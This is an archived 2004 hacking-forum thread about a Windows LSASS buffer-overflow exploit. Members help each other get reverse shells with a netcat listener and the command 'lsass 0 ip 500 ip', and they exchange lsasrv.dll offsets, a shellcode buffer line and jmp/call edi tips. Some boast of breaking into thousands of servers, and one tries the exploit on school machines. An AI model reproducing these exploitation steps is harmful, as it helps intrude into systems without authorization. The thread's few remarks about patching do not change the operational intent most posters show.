hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant
Help - Search - Member List - Calendar
GovernmentSecurity.org > The Archives > Public Downloads
Pages: 1, 2, 3, 4
F34R
Apr 26 2004, 09:11 PM
Yeah I got the same prob. Nc is listening and the exploit seems to have worked but I dont get a shell... just keeps listening...
Any help peeps? dry.gif
blackP0ster
Apr 26 2004, 11:02 PM
sometimes i get the same "error". maybe it's because of firewalls..but i don't know..

but it works..got some nice 100mbit boxes smile.gif

black
shiz
Apr 27 2004, 05:54 AM
stop callin eachother n00bs, you bunch of arrogant fucks..
if you not like this here board, i suggest you leave and DIE...
Killaloop
Apr 27 2004, 07:35 AM
script kidds and autohaxxer freaks if you want to make some more admins mad do it NOW. Captured the first Worm to this exploit today at 4 am on 2 of my vulnerable testmachines (5 hours ago). didn't have the time to take a look what exactily it does...but what I can tell is it fixes the vulnerability (Return 5).
it didn't listen on a port while it was running, more information when I'm back from work.


/edit
End its fun to see you guys trying to hack ... what most of you scriptkids with their autohaxxer produce is a bunch of sh*t. one trying to extract his rar archiv opened up his unrarer 20 times and much more of that fun. I love it
how do I know it are some from you? well using the ONLY on this board posted modded hxdef and not renaming the service or files (isplog.exe...)...
yeah some of you need files and scripts predone for everything...it's a shame
z0mbi3
Apr 27 2004, 09:02 AM
this thinges gr8
thnx to dr0zaxx & strasharo
cracken
Apr 27 2004, 11:07 AM
Killaloop
i'm agree with your statment..
all those how have a IQ >100 better dont try hacking because a brain and some skill are always required;)

cya
shiz
Apr 27 2004, 11:11 AM
whats your IQ then cracken, when you arent even able to use the proper character...
> means larger than...
im startin to grow a dislike for your attitude on this board..if you dont have anything usefull to say, then please shut that trap, and dont post at all..
please work on it, i know you can do it..
mille
Apr 27 2004, 05:00 PM
anyone tested exploit for xp?
If someone can download service pack 1 for win xp .cn and post here lsass.exe and lsasrv.dll I 'll add more offset. I'm waiting you! (I have no bandwidth:()
Btbw
Apr 27 2004, 05:02 PM
allways have null session failled ... i think uit's very hard now to find a serv which allow the null session :/
night^man
Apr 27 2004, 07:48 PM
this spolit r0x laugh.gif biggrin.gif smile.gif rolleyes.gif
QuadMedic
Apr 27 2004, 08:22 PM
laugh.gif this is a l33t and dangerous sploit ......... patch your servers m8s unsure.gif
Toilal
Apr 27 2004, 10:16 PM
I recoded this exploit, add another shellcode (listening cmd.exe on port 4444) and making shell spawning right in the exploit. It works on about 90% of vuln 2K servers (see DSScan.exe and xp2k_detect.exe in this forum).

Of course, the admins guys should patch ...
DaClueless
Apr 28 2004, 12:05 AM
QUOTE (Killaloop @ Apr 27 2004, 07:35 AM)
/edit
End its fun to see you guys trying to hack ... what most of you scriptkids with their autohaxxer produce is a bunch of sh*t. one trying to extract his rar archiv opened up his unrarer 20 times and much more of that fun.

I dont know if it fun, or scary because a lot of the scriptkiddie get into trouble with hacking more then any other type of hacker.

Why?
    A Few main reasons:
  • The dont have the skill, to understand they are JUMPING UP AND DOWN, and YELLING, I am hacker.. I live here, Come arrest me now.
  • There a lot stuff, that ISP use know to detect hacker/worms <-- Jumping up and Down
  • scriptkiddie , normally run for a long time, making it easier for the Admin to see it <-- YELLING
  • Most scriptkiddie , dont know how to work through a proxy <-- I live here
  • So in short, the POLICE, love script kiddie <-- Come arrest me now
DarkAngel52457
Apr 28 2004, 12:46 AM
hmm i scan and scan and scan and i find not vuln ich find many ips whit open port 139 and when i check ips whit dsscan is the result = vuln can me say what for a range is god


Sorry for my bad englisch
qwerty_tr
Apr 28 2004, 12:49 AM
yep lots of scans with no results I can't even find any port 139 om eu range

can some1 give an exploitable example range
WeeDMoNKeY
Apr 28 2004, 12:57 AM
QUOTE (qwerty_tr @ Apr 28 2004, 12:49 AM)
yep lots of scans with no results I can't even find any port 139 om eu range

can some1 give an exploitable example range

scan 65.200.192.16 ... its exploitable :>>>>>>>> (connect to it via explorer :>)

./JOKE (IF YOU DONT GET IT, DONT SCAN IT....)

learn to find your own ranges. www.ipindex.de

tweakz20
Apr 28 2004, 01:12 AM
i did a ping check; that ip is real... whois said it belonged to "UUNET Technologies, Inc.".. i don't get the joke...? and giving out ips is against the rules... for future reference
Flowby
Apr 28 2004, 04:54 AM
QUOTE (Toilal @ Apr 27 2004, 10:16 PM)
I recoded this exploit, add another shellcode (listening cmd.exe on port 4444) and making shell spawning right in the exploit. It works on about 90% of vuln 2K servers (see DSScan.exe and xp2k_detect.exe in this forum).

Of course, the admins guys should patch ...

Can you upload it here please?
Flowby
Apr 28 2004, 04:55 AM
ok here is the lsass.exe from service pack 1

this is not exsploit this is file for offset
Krogoth
Apr 28 2004, 05:10 AM
my isp has blocked port 139 since blaster worm incident. the other way round is to get a remote shell and execute from there to another box. i hope i'll be able to do that.

thanks for compiling Flowby, i'm going to test it.
qwerty_tr
Apr 28 2004, 07:11 AM
yo ppl
when I try to sploit it over the lan at school (I can find voln. with dsscan)

after sploiting, my computer gives me a 60 sec reboot message any1 knows why?

The boxes I am trying to sploit is xp en and the box I am using is also xp en.
Gurou
Apr 28 2004, 09:04 AM
QUOTE (Toilal @ Apr 27 2004, 10:16 PM)
I recoded this exploit, add another shellcode (listening cmd.exe on port 4444) and making shell spawning right in the exploit. It works on about 90% of vuln 2K servers (see DSScan.exe and xp2k_detect.exe in this forum).

Of course, the admins guys should patch ...

post the code here ?
tolf
Apr 28 2004, 10:11 AM
QUOTE (qwerty_tr @ Apr 28 2004, 07:11 AM)
yo ppl
when I try to sploit it over the lan at school (I can find voln. with dsscan)

after sploiting, my computer gives me a 60 sec reboot message any1 knows why?

The boxes I am trying to sploit is xp en and the box I am using is also xp en.

because the code is only for XP china not en...

it will only work for 2k sp4 properly..

theres a local one here that works try that by PS to the box or on your own.
Stephen79
Apr 28 2004, 10:32 AM
Just a note to say that after Nortons defs where updated, the sbaanetapi.dll is not detected as a virus, so if you are using this, then you will need to allow it, or disable "real time" protection.
qwerty_tr
Apr 28 2004, 03:12 PM
any1 knows an ofset for xp en boxes for this expl. or have a compiled exploit whick can xploit xp en boxes?

thx
Flowby
Apr 28 2004, 04:57 PM
So i can exschange the english offset for german xp if somebody wants??
PM me
shii
Apr 28 2004, 05:20 PM
it only works for CHINESE boxes, i suggest all peepz in here to read the programmer notices..........be smart dudes
Flowby
Apr 28 2004, 05:31 PM
QUOTE (shii @ Apr 28 2004, 05:20 PM)
it only works for CHINESE boxes, i suggest all peepz in here to read the programmer notices..........be smart dudes

be smart lol ,it works only on chineze becouse there is only chineze offset....
wink.gif

ok this i found ,but now i dont know vich offset i am looking for??



--=[ lsasrv.dll ]=--

DsRolerDcAsDc 0x74590bd7
DsRolerDcAsReplica 0x745902c8
DsRolerDemoteDc 0x745904db
DsRolerGetDcOperationProgress 0x7458fe29
DsRolerGetDcOperationResults 0x7458fe80
LsaIAddNameToLogonSession 0x7452cb74
LsaIAllocateHeap 0x7456b925
LsaIAllocateHeapZero 0x7452388a
LsaIAuditAccountLogon 0x7456f009
LsaIAuditKdcEvent 0x7456eada
LsaIAuditKerberosLogon 0x7456ead1
LsaIAuditLogonUsingExplicitCreds 0x74542d7e
LsaIAuditNotifyPackageLoad 0x74533a8c
LsaIAuditPasswordAccessEvent 0x7456fa62
LsaIAuditSamEvent 0x7456f506
LsaICallPackage 0x74541b44
LsaICallPackageEx 0x74541b65
LsaICallPackagePassthrough 0x7456b98b
LsaICancelNotification 0x7456b82a
LsaIChangeSecretCipherKey 0x7457456e
LsaICryptProtectData 0x7459a8a1
LsaICryptUnprotectData 0x7459a9d4
LsaIDsNotifiedObjectChange 0x74575b40
LsaIEnumerateSecrets 0x745742db
LsaIEventNotify 0x7456b825
LsaIFilterSids 0x74576ca6
LsaIForestTrustFindMatch 0x74576ab7
LsaIFreeForestTrustInfo 0x7457ad3d
LsaIFreeHeap 0x74523809
LsaIFreeReturnBuffer 0x74541bcc
LsaIFree_LSAI_PRIVATE_DATA 0x7456fc23
LsaIFree_LSAI_SECRET_ENUM_BUFFER 0x7456fbdb
LsaIFree_LSAPR_ACCOUNT_ENUM_BUFFER 0x745367e1
LsaIFree_LSAPR_CR_CIPHER_VALUE 0x74544b1b
LsaIFree_LSAPR_POLICY_DOMAIN_INFORMATION 0x74536f17
LsaIFree_LSAPR_POLICY_INFORMATION 0x74543ad5
LsaIFree_LSAPR_PRIVILEGE_ENUM_BUFFER 0x7456fc31
LsaIFree_LSAPR_PRIVILEGE_SET 0x7456fc23
LsaIFree_LSAPR_REFERENCED_DOMAIN_LIST 0x7456fba6
LsaIFree_LSAPR_SR_SECURITY_DESCRIPTOR 0x7456fc0a
LsaIFree_LSAPR_TRANSLATED_NAMES 0x7456fb78
LsaIFree_LSAPR_TRANSLATED_SIDS 0x7456fb6a
LsaIFree_LSAPR_TRUSTED_DOMAIN_INFO 0x7456fb86
LsaIFree_LSAPR_TRUSTED_ENUM_BUFFER 0x7456fbbf
LsaIFree_LSAPR_TRUSTED_ENUM_BUFFER_EX 0x7456fbcd
LsaIFree_LSAPR_TRUST_INFORMATION 0x7453e2a5
LsaIFree_LSAPR_UNICODE_STRING 0x7456fc0a
LsaIFree_LSAPR_UNICODE_STRING_BUFFER 0x7456fb6a
LsaIFree_LSAP_SITENAME_INFO 0x7457b668
LsaIFree_LSAP_SITE_INFO 0x7457b5f1
LsaIFree_LSAP_SUBNET_INFO 0x7457b625
LsaIFree_LSAP_UPN_SUFFIXES 0x7457b5f1
LsaIFree_LSA_FOREST_TRUST_COLLISION_INFORMATION 0x74576afd
LsaIFree_LSA_FOREST_TRUST_INFORMATION 0x74576adf
LsaIGetBootOption 0x7457cbc3
LsaIGetCallInfo 0x74524d92
LsaIGetForestTrustInformation 0x7457e25b
LsaIGetLogonGuid 0x74542994
LsaIGetNbAndDnsDomainNames 0x74542d17
LsaIGetPrivateData 0x74581270
LsaIGetSerialNumberPolicy 0x7458157a
LsaIGetSerialNumberPolicy2 0x74581528
LsaIGetSiteName 0x7457bc2a
LsaIHealthCheck 0x745366d6
LsaIImpersonateClient 0x74523e18
LsaIInitializeWellKnownSids 0x7453c1a8
LsaIIsClassIdLsaClass 0x745827b8
LsaIIsDsPaused 0x7457b688
LsaIKerberosRegisterTrustNotification 0x74574aa3
LsaILookupWellKnownName 0x74583252
LsaINotifyChangeNotification 0x74537442
LsaINotifyNetlogonParametersChangeW 0x7457bc11
LsaINotifyPasswordChanged 0x745604bb
LsaIOpenPolicyTrusted 0x7452e950
LsaIQueryForestTrustInfo 0x7457b2be
LsaIQueryInformationPolicyTrusted 0x745342d1
LsaIQuerySiteInfo 0x7457be19
LsaIQuerySubnetInfo 0x7457bfb4
LsaIQueryUpnSuffixes 0x7457c226
LsaIRegisterNotification 0x74534303
LsaIRegisterPolicyChangeNotificationCallback 0x7452918a
LsaISafeMode 0x74533839
LsaISamIndicatedDsStarted 0x74582ca6
LsaISetBootOption 0x7457cab0
LsaISetClientDnsHostName 0x7457b698
LsaISetLogonGuidInLogonSession 0x7452ed64
LsaISetPrivateData 0x7458130c
LsaISetSerialNumberPolicy 0x74581509
LsaISetTimesSecret 0x74573cf2
LsaISetupWasRun 0x7453562f
LsaITestCall 0x74584cc8
LsaIUnregisterAllPolicyChangeNotificationCallback 0x74584613
LsaIUnregisterPolicyChangeNotificationCallback 0x745845be
LsaIUpdateForestTrustInformation 0x745809c7
LsaIWriteAuditEvent 0x74543a35
LsapAuOpenSam 0x7452b78d
LsapCheckBootMode 0x7453caf2
LsapDsDebugInitialize 0x7453383f
LsapDsInitializeDsStateInfo 0x74533aa6
LsapDsInitializePromoteInterface 0x74533b12
LsapInitLsa 0x745340a4
LsarAddPrivilegesToAccount 0x74585653
LsarClose 0x74522836
LsarCreateAccount 0x74584ced
LsarCreateSecret 0x7457403f
LsarCreateTrustedDomain 0x7457a6ae
LsarCreateTrustedDomainEx 0x7457a5d0
LsarDelete 0x74584cde
LsarEnumerateAccounts 0x7453578f
LsarEnumeratePrivileges 0x74585af7
LsarEnumeratePrivilegesAccount 0x74585641
LsarEnumerateTrustedDomains 0x7457a6dc
LsarEnumerateTrustedDomainsEx 0x7457aa35
LsarGetQuotasForAccount 0x74584e03
LsarGetSystemAccessAccount 0x7458567b
LsarLookupNames 0x745843aa
LsarLookupPrivilegeDisplayName 0x74585bde
LsarLookupPrivilegeName 0x74585b50
LsarLookupPrivilegeValue 0x74521c3a
LsarLookupSids 0x74586c5e
LsarLookupSids2 0x74544fd8
LsarOpenAccount 0x745376c8
LsarOpenPolicy 0x74543da2
LsarOpenPolicySce 0x745813c2
LsarOpenSecret 0x745443f6
LsarOpenTrustedDomain 0x74576bbf
LsarOpenTrustedDomainByName 0x74576a83
LsarQueryDomainInformationPolicy 0x7453794f
LsarQueryForestTrustInformation 0x7457ff98
LsarQueryInformationPolicy 0x7452360e
LsarQueryInfoTrustedDomain 0x74576ed6
LsarQuerySecret 0x74544723
LsarQuerySecurityObject 0x745876d1
LsarQueryTrustedDomainInfo 0x74588c53
LsarQueryTrustedDomainInfoByName 0x7457881c
LsarRemovePrivilegesFromAccount 0x74585665
LsarSetDomainInformationPolicy 0x74587356
LsarSetForestTrustInformation 0x74580150
LsarSetInformationPolicy 0x7453722a
LsarSetInformationTrustedDomain 0x745792c9
LsarSetQuotasForAccount 0x74584e13
LsarSetSecret 0x7454e3c0
LsarSetSecurityObject 0x7458788d
LsarSetSystemAccessAccount 0x745856bb
LsarSetTrustedDomainInfoByName 0x7457a454
ServiceInit 0x7453a373
shii
Apr 28 2004, 05:36 PM
hihi indeed flowby, if anyone got the US-UK international offset he's welcome
mille
Apr 28 2004, 06:00 PM
QUOTE (shii @ Apr 28 2004, 05:36 PM)
hihi indeed flowby, if anyone got the US-UK international offset he's welcome

if you can download service pack 1 for windows xp chinese version and post here lsass.exe and lsasvr.dll I can find a way to get more offset.
You don't need to install it, just download (about 120 MB) and extract files.
I can't download because I have a slow 56k connection...
morbido
Apr 28 2004, 06:58 PM
hmm im having some error which is i get no shell, i have tested it on about 20 ip's and i know atleast 10 had shells as my friend tested them after me and recived a shell

im not running a firwall or router

im using the exact same files as my friend

it dosnt say the null session failed

all it says is

shellcode 112
some other shit

but i never get a shell
i made my friend try to connect to my nc and he got in, so whats going on i dont understand

if anyone can help contact me on msn demonkid1@hotmail.com
ScriptGod
Apr 28 2004, 07:07 PM
QUOTE (qwerty_tr @ Apr 28 2004, 03:12 PM)
any1 knows an ofset for xp en boxes for this expl. or have a compiled exploit whick can xploit xp en boxes?

thx

i got universal offsets for win2k german and english, but these values are not jump esp, they are call edi in my own private exploits, so you cannot use this with the public exploits, without modification
totof
Apr 28 2004, 08:08 PM
check that there is the 2 files sp1 chinese XP:
IF you succed compile the new version and give too wink.gif , what do you do with that
totof
Apr 28 2004, 08:09 PM
sp1 Chinese Xp:
and the lssas.dll
MxMx
Apr 28 2004, 08:41 PM
this sploit is too great to share ..
ive hacked over 3000 servers .. still no virus for this sec. issue released lol .. cant be long now tongue.gifbiggrin.gif
hifil0wlife
Apr 28 2004, 08:44 PM
to all you who say you got a private exploit: if you're not sharing nobody cares
ScriptGod
Apr 28 2004, 09:02 PM
QUOTE (hifil0wlife @ Apr 28 2004, 08:44 PM)
to all you who say you got a private exploit: if you're not sharing nobody cares

i don't share. but i gave a hint how you can make it by your own, if you cannot do that or you don't like to spent time in developing such a exploit, it's better that you don't have such an exploit
Flowby
Apr 28 2004, 09:13 PM
Where is the hint!!
And why are you like that we are here to help each other!!We all have big count of posts we are not newbs so why cant yu post your code of your working exsploit???
Post the code!!!!!!!!!!!!!!!!!!!!!1
ScriptGod
Apr 28 2004, 09:29 PM
QUOTE (Flowby @ Apr 28 2004, 09:13 PM)
Where is the hint!!
And why are you like that we are here to help each other!!We all have big count of posts we are not newbs so why cant yu post your code of your working exsploit???
Post the code!!!!!!!!!!!!!!!!!!!!!1

I cannot post the code atm because i don't want to support script kiddies... if i would post this code, all of you could hack all vuln xp/2k ger/eng machines and at in this forum are not only a frew noobs a think

I don't analyzed the exploits completly, but it looks like

memcpy(&sendbuf[1948], "\xb8\x44\xf8\xff\xff\x03\xc4\x81\xec\x00\x20\x00\x00\xff\xe0\x00", 16);

need to be placed at a higher place in the buffer, if you use call edi. call edi is ff d7 or jmp edi ff e7. these are other offsets. there are much more jmp/call edi offsets than the jmp/call esp. btw call/jmp edi is only possible under 2k. under xp you only can use the esp register, but this doesn't matter, there is universal offset for german/english, maybe the same on other languages
flashb4ck
Apr 28 2004, 09:39 PM
hm i hate the autohaxx0rs which are used by the whole kiddies ...
now i can see who is interested @ the source and who only want to own the boxes wink.gif

@ all kiddies

if u want to run this sploit successful 1st learn to understand the code wink.gif



p.s this is the hardest sploit i've ever seen after dcom ^^


gr€€tz fL4Shb4Ck
Killaloop
Apr 28 2004, 09:44 PM
QUOTE (ScriptGod @ Apr 28 2004, 09:02 PM)
QUOTE (hifil0wlife @ Apr 28 2004, 08:44 PM)
to all you who say you got a private exploit: if you're not sharing nobody cares

i don't share. but i gave a hint how you can make it by your own, if you cannot do that or you don't like to spent time in developing such a exploit, it's better that you don't have such an exploit

well exploiting XP has become useless hasn't it?
when you exploit xp with in the way the public exploit is written you crash the rcp server and reboot the machine. this has happend to me..I patched my systems but didn't want to reboot then someone exploited me and crashes my sys...
so now I'm patched and even a good xp exploit would be useless.
or do you still have good results with the xp offsets?
BigOne
Apr 28 2004, 09:58 PM
Thx for it wink.gif

Nice work!


greetz, BigOne
WeeDMoNKeY
Apr 28 2004, 11:19 PM
QUOTE (tweakz20 @ Apr 28 2004, 01:12 AM)
i did a ping check; that ip is real... whois said it belonged to "UUNET Technologies, Inc.".. i don't get the joke...? and giving out ips is against the rules... for future reference

its to a fbi.gov site ;D lol :>
ScriptGod
Apr 28 2004, 11:38 PM
QUOTE (Killaloop @ Apr 28 2004, 09:44 PM)
QUOTE (ScriptGod @ Apr 28 2004, 09:02 PM)
QUOTE (hifil0wlife @ Apr 28 2004, 08:44 PM)
to all you who say you got a private exploit: if you're not sharing nobody cares

i don't share. but i gave a hint how you can make it by your own, if you cannot do that or you don't like to spent time in developing such a exploit, it's better that you don't have such an exploit

well exploiting XP has become useless hasn't it?
when you exploit xp with in the way the public exploit is written you crash the rcp server and reboot the machine. this has happend to me..I patched my systems but didn't want to reboot then someone exploited me and crashes my sys...
so now I'm patched and even a good xp exploit would be useless.
or do you still have good results with the xp offsets?

xp uses ANSI instead of UNICODE string. so the public i've seen do a conversion from 1-Byte to 2-Byte string. so the cannot have any effect on xp systems. in windows strings are terminated with a hex 0

AB -- TO UNICODE --> A \x0 B \x0

if you read this as an ANSI string (under xp) the 0 characters is found at the 2nd position, so there is only a string with one byte -> no buffer overflow, no epxloiting, no crash
Killaloop
Apr 29 2004, 12:11 AM
QUOTE (ScriptGod @ Apr 28 2004, 11:38 PM)

if you read this as an ANSI string (under xp) the 0 characters is found at the 2nd position, so there is only a string with one byte -> no buffer overflow, no epxloiting, no crash

I know the difference
all I can tell is that I got crashed because of this exploit and look at board postings you will see that I'm not the only one
DaClueless
Apr 29 2004, 02:25 AM
QUOTE (ScriptGod @ Apr 28 2004, 09:29 PM)

I cannot post the code atm because i don't want to support script kiddies... if i would post this code, all of you could hack all vuln xp/2k ger/eng machines and at in this forum are not only a frew noobs a think

I agree with ScriptGod.

Personally, I feel, people who see how EVIL they can make an exploit and give it world, should have the police give them a call. I am suprise, a company who has taken damages from the exploit, doesnt go after the person who made MOD exploit.

I know, in a lot of country, it illegal to made a binary use to get root access. Sometime, I am scared GovernmentSecurity.org, will get into trouble for people posting stuff.

I know, this will upset a lot of people, so I am sorry. But, it hurt because it the truth, GovernmentSecurity.org can get into trouble for things people post.

DaClueless

WeeDMoNKeY
Apr 29 2004, 04:45 AM
QUOTE (DaClueless @ Apr 29 2004, 02:25 AM)
QUOTE (ScriptGod @ Apr 28 2004, 09:29 PM)

I cannot post the code atm because i don't want to support script kiddies... if i would post this code, all of you could hack all vuln xp/2k ger/eng machines and at in this forum are not only a frew noobs a think

I agree with ScriptGod.

Personally, I feel, people who see how EVIL they can make an exploit and give it world, should have the police give them a call. I am suprise, a company who has taken damages from the exploit, doesnt go after the person who made MOD exploit.

I know, in a lot of country, it illegal to made a binary use to get root access. Sometime, I am scared GovernmentSecurity.org, will get into trouble for people posting stuff.

I know, this will upset a lot of people, so I am sorry. But, it hurt because it the truth, GovernmentSecurity.org can get into trouble for things people post.

DaClueless

Please never talk again in your life. Thanks.

Some people here actually have networks and buisness's with multiple operating systems.

I myself look after 500+ computers on a network on a strong 100mbit backbone. If it wasn't for this site i wouldn't have ran my patching program the second i saw how powerful it was (newest lass exploit, since i have many winnt sp4 machines running servers for me).

Then did a check of all machines and bandwidth.

Then again thirs little kids like you who cry and get scared because PEOPLE ARE TRYING TO PROTECT THEMSELVES. Btw, learn to read disclaimers.

"Governmentsecurity is no liable for the stuff posted on this site, or how it's used".

So if your in some random country that disallows "hacking" (system security) you shouldn't be here.

And script god, good choice. These kiddies don't need offsets. They need diapers.

(I've found a universal offset, doing abunch of stuff, no use to me, but good to know)
DaClueless
Apr 29 2004, 05:49 AM
QUOTE (WeeDMoNKeY @ Apr 29 2004, 04:45 AM)
Please never talk again in your life. Thanks.

Some people here actually have networks and buisness's with multiple operating systems.

I myself look after 500+ computers on a network on a strong 100mbit backbone. If it wasn't for this site i wouldn't have ran my patching program the second i saw how powerful it was (newest lass exploit, since i have many winnt sp4 machines running servers for me).


Then again thirs little kids like you who cry and get scared because PEOPLE ARE TRYING TO PROTECT THEMSELVES. Btw, learn to read disclaimers.

"Governmentsecurity is no liable for the stuff posted on this site, or how it's used".

So if your in some random country that disallows "hacking" (system security) you shouldn't be here.

And script god, good choice. These kiddies don't need offsets. They need diapers.

(I've found a universal offset, doing abunch of stuff, no use to me, but good to know)

I feel, I should have been more clear. After reading your post, I most have confuse you.
  • I feel GovernmentSecurity.org is good thing.
  • I feel, it good for people to post, an exploit. (source code version), so people like yourself and I see the problems and make sure the patching works ok.
  • I feel, it bad for people to post ways to make the exploit more EVIL. Most of the orig exploit writers, understand it good to add a lot of limits to thier Full-Disclosure of the exploit.
  • I feel, it is bad for people to make auto-hacker and give it to script kiddies, because they normally use for EVIL instead of GOOD.
  • I feel, it only a matter of time, before GOV starts cracking down on authors of EVIL version of the exploit and Auto-hackers.
  • Also, I feel it a matter of time, before business will start going after authors of EVIL version of the exploit and Auto-hackers. The reason is simple, when a business loses money because a hacker, sometimes they go after an easier target like the author then the hacker (more to show, that are doing things to stop hackers).
  • But, these are just my feeling of what I feel will happen in the future.

Just because Governmentsecurity.org has a disclaimer, doent stop a business who has not agree to the disclaimer to go after them.

What I dont want to happen, is GovernmentSecurity.org getting hurt because something a member has done. Which I feel, you agree with me about.
zombie
Apr 29 2004, 06:13 AM
are you sure it only works on Chineese Windows?
i have gotten shell on 2 Danish boxes with this exploit.
c°h°
Apr 29 2004, 08:07 AM
mm 4 me this exploit is unuseable i tested some ips, but like someone before said nc still listening without spawning a shell.
1. Step:
C:\winnt\system32\nc -vv -l -p 500
listening on [any] 500 ...

2. Step
lsass 0 "vuln ip" 500 "ip nc is listening"
shellcode size 316
Ret value = 1726

but nc still listening ...

OK maybe some modified versions work i dunno but this one posted here dont works 4 me.


greetz ch
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
 
Invision Power Board © 2001-2005 Invision Power Services, Inc.